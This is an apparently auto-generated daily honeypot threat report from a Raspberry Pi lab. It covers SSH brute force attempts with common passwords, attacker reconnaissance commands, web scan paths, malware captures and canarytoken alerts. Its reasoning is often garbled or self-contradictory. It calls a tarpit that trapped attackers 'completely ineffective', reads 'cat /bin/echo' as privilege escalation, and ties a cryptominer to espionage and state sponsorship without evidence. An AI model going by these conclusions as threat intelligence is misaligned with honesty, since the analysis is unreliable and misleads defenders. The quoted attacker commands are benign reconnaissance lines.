Tuesday, 12 May 2026 💀 critical 🤖 qwen2.5:1.5b

Honeypot Threat Analysis — May 12, 2026

Critical threat level — massive coordinated attack activity across all honeypot services.

🌍 77 unique attackers ⚡ 4,760 events 📊 View raw data report →
ssh-brute-forcehoneypotweb-scanningmulti-protocolhigh-severitymalware-capturethreat-intelligence

Threat Landscape Overview

Today’s threat landscape highlights a high volume of SSH honeypots being exploited. The Cowrie version of the honeypot saw 956 connections and 909 login attempts with an impressive 166 commands executed and 38 unique IP addresses reported. This indicates that attackers are highly persistent in their efforts to breach this security measure.

The Multi-protocol honeypot (OpenCanary) received a significant amount of events, with 3717 occurrences across various protocols including FTP/Telnet/MySQL/Redis/VNC/Git. The high number of events suggests ongoing attacks targeting different ports and protocols simultaneously.

In the HTTP LLM honeypot (Galah + qwen AI), there were only 87 requests but 25 unique IP addresses reported. This indicates that while the API is active, it may not be fully utilized for exploitation purposes.

The SSH tarpit on ports 222/2200/8022/22222 was completely ineffective as all connections were trapped and wasted time. Trapping these attackers has shown to be a valuable defense mechanism but requires continuous monitoring and updates to ensure effectiveness.

Geographic Analysis

The geolocation data indicates that the majority of attacks originate from United States (137 IPs, 25%), Belgium (70 IPs, 12%), France (47 IPs, 8%), Germany (31 IPs, 5%), Netherlands (30 IPs, 5%), China (22 IPs, 4%), Finland (21 IPs, 3%), United Kingdom (14 IPs, 2%), and Vietnam (10 IPs, 1%). This shows a geographical spread of attack patterns.

SSH Brute Force Analysis

The primary focus of the attackers appears to be brute force methods. The most common passwords tried include “123456,” “admin,” “123,” and “password.” These attacks are targeting root access, as seen in successful logins such as “root:admin,” “root:@,” and “root:root123.”

Post-Exploitation Behavior

The TTY sessions show a series of basic commands that attackers are likely using to establish their foothold. The command “uname -s -v -n -r -m” is commonly used for system information, while “/bin/./uname -s -v -n -r -m” suggests they have already gained root access and are familiar with the environment.

The commands executed after gaining root access include “cat /bin/echo,” which likely indicates an attempt to escalate privileges or confirm their presence. The subsequent actions of “echo -n test>/tmp/.config” and “cat /tmp/.config” suggest they were looking for ways to maintain persistence on the system.

Web Scanner Activity

The HTTP scanning patterns indicate that attackers are targeting well-known services like ”/,” ”/”, “/login”, “/og-default.png”, “/sitemap.xml”, and ”/” (subdomain). This suggests they are conducting reconnaissance of common directories and paths, possibly preparing their payloads or looking for vulnerable systems to exploit further.

Malware Captures

The malware samples captured via SSH include a miner engine targeting the United States with engines 44/74, indicating it is likely part of an ongoing cyber-espionage campaign. The trojan generator targeting China suggests this group may be involved in state-sponsored attacks as well. These details are crucial for attribution and response.

SSH Tarpit (Endlessh)

Despite the tarpit being active, 6 connections were trapped from two unique IP addresses, indicating that while some attackers managed to bypass it initially, they were eventually caught. This suggests a need for more advanced defense mechanisms or continuous updates to improve effectiveness.

Canarytoken Alerts

The number of canarytoken alerts triggered (17) indicates that fake AWS tokens and SSH keys have been used by the attackers to simulate multiple identities. These attacks highlight the importance of detecting such false credentials in honeypots to protect against phishing and other social engineering tactics.

Community Defense

All reported IPs are shared with AbuseIPDB, AlienVault OTX, Blocklist.de, and SANS DShield for further investigation and mitigation. The malware samples have been submitted to VirusTotal and OTX, providing valuable data for threat hunting and response strategies.

Honeypot Infrastructure

The honeypot infrastructure is maintained on a Raspberry Pi 5 in Spain using an open-source approach, ensuring flexibility and adaptability based on the evolving nature of cybersecurity threats.

This analysis was generated by qwen2.5:1.5b running locally on the Raspberry Pi 5 honeypot lab. All data comes from real attacks captured in the last 24 hours. View the raw data report for complete metrics.

🤖

This analysis was generated by qwen2.5:1.5b running locally on the same Raspberry Pi 5 that operates the honeypots. No data leaves the device. All threat data is sourced from real attacks captured in the last 24 hours.

← All analyses 📊 Data report →